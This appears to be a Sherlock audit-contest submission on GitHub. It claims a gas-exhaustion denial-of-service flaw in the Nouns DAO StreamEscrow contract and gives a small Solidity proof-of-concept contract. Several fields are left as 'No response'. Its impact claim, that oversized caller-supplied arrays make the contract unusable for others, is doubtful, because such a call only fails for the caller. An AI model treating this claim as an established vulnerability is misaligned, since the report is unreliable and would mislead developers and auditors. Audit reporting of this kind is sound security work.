Skip to content

Latest commit

 

History

History
65 lines (41 loc) · 1.74 KB

002.md

File metadata and controls

65 lines (41 loc) · 1.74 KB

Flat Tartan Mantis

Medium

vah - Gas Exhaustion Vulnerability in StreamEscrow Contract

Summary

A vulnerability exists in the StreamEscrow contract, specifically in the cancelStreams and fastForwardMultipleStreams functions, where unbounded processing of input arrays can lead to gas exhaustion. This can result in denial of service (DoS) for users attempting to interact with the contract.

Root Cause

Contract: https://github.com/sherlock-audit/2024-11-nounsdao/blob/main/nouns-monorepo/packages/nouns-contracts/contracts/StreamEscrow.sol#L231

Internal pre-conditions

No response

External pre-conditions

No response

Attack Path

  1. Deploy Malicious Contract The attacker deploys a contract (GasExhaustionAttack) that creates large arrays and attempts to call the vulnerable functions.

  2. Generate Large Arrays The attacker creates arrays of arbitrary length using the malicious contract.

  3. Call Vulnerable Function The attacker calls fastForwardMultipleStreams with the large arrays, causing the transaction to consume excessive gas and fail.

Impact

Denial of Service (DoS): The contract becomes unusable for legitimate users during an attack.

PoC

pragma solidity ^0.8.19;

contract GasExhaustionAttack {
    StreamEscrow public target;
    constructor(address _target) {
        target = StreamEscrow(_target);
    }
    function attack(uint256 largeNumber) external {
        uint256[] memory nounIds = new uint256[](largeNumber);
        uint32[] memory ticks = new uint32[](largeNumber);
        for(uint256 i = 0; i < largeNumber; i++) {
            nounIds[i] = i + 1;
            ticks[i] = 1;
        }
        target.fastForwardMultipleStreams(nounIds, ticks);
    }
}

Mitigation

No response